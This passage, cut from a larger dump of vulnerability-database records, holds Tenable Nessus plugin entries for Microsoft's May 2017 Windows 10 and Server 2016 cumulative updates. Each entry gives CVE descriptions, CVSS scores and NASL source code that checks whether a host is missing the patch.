value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkb = make_list(\n '4019473' # 10 1511\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kb, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # 10 (1511)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date: \"05_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4019473))\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:23:04", "description": "The remote Windows host is missing 
security update KB4019472. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - A denial of service vulnerability exists in the Windows DNS server when it's configured to answer version queries. An unauthenticated, remote attacker can exploit this, via a malicious DNS query, to cause the DNS server to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the Windows Graphics Device Interface (GDI) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V due to improper validation of vSMB packet data. An unauthenticated, adjacent attacker can exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. 
(CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Edge due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0221)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. 
An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0229)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user.\n (CVE-2017-0230)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper sandboxing. An unauthenticated, remote attacker can exploit this to break out of the Edge AppContainer sandbox and gain elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. 
(CVE-2017-0236)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper rendering of a domain-less page in the URL. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause the user to perform actions in the context of the Intranet Zone and access functionality that is not typically available to the browser when browsing in the context of the Internet Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. 
(CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the Microsoft scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a crafted web page or open a crafted Office document file, to execute arbitrary code in the context of the current user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. 
An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. 
An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "KB4019472: Windows 10 Version 1607 and Windows Server 2016 May 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0190", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0221", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0227", "CVE-2017-0228", "CVE-2017-0229", "CVE-2017-0230", "CVE-2017-0231", "CVE-2017-0233", "CVE-2017-0234", "CVE-2017-0236", "CVE-2017-0238", "CVE-2017-0240", "CVE-2017-0241", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0266", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019472.NASL", "href": "https://www.tenable.com/plugins/nessus/100059", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100059);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0171\",\n \"CVE-2017-0190\",\n \"CVE-2017-0212\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0221\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0227\",\n \"CVE-2017-0228\",\n \"CVE-2017-0229\",\n \"CVE-2017-0230\",\n \"CVE-2017-0231\",\n \"CVE-2017-0233\",\n \"CVE-2017-0234\",\n \"CVE-2017-0236\",\n 
\"CVE-2017-0238\",\n \"CVE-2017-0240\",\n \"CVE-2017-0241\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0266\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98097,\n 98099,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98147,\n 98164,\n 98173,\n 98179,\n 98203,\n 98208,\n 98217,\n 98222,\n 98229,\n 98234,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98276,\n 98281,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4019472\");\n script_xref(name:\"MSFT\", value:\"MS17-4019472\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"KB4019472: Windows 10 Version 1607 and Windows Server 2016 May 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update KB4019472. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). 
(CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - A denial of service vulnerability exists in the Windows\n DNS server when it's configured to answer version\n queries. An unauthenticated, remote attacker can exploit\n this, via a malicious DNS query, to cause the DNS server\n to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics Device Interface (GDI) due to improper\n handling of objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V due to improper validation of vSMB\n packet data. An unauthenticated, adjacent attacker can\n exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. 
(CVE-2017-0221)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or open a specially\n crafted Microsoft Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. 
(CVE-2017-0229)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-0230)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper sandboxing. An\n unauthenticated, remote attacker can exploit this to\n break out of the Edge AppContainer sandbox and gain\n elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. 
An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper rendering of a\n domain-less page in the URL. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause the user to\n perform actions in the context of the Intranet Zone and\n access functionality that is not typically available to\n the browser when browsing in the context of the Internet\n Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. 
(CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the\n Microsoft scripting engines due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n crafted web page or open a crafted Office document file,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. 
An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. 
An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019472/windows-10-update-kb4019472\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?038b505a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4019472.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\n## NB: Microsoft \nbulletin = 'MS17-05';\nkbs = make_list(4019472);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# Update only applies to Windows 10 1607 / Server 2016\nif (hotfix_check_sp_range(win10:'0') <= 0) \n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 10 1607 / Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"05_2017\", bulletin:bulletin, rollup_kb_list:kbs)\n)\n{\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:22:30", "description": "The remote Windows 10 version 1703 host is missing security update KB4016871. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. 
An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V due to improper validation of vSMB packet data. An unauthenticated, adjacent attacker can exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain 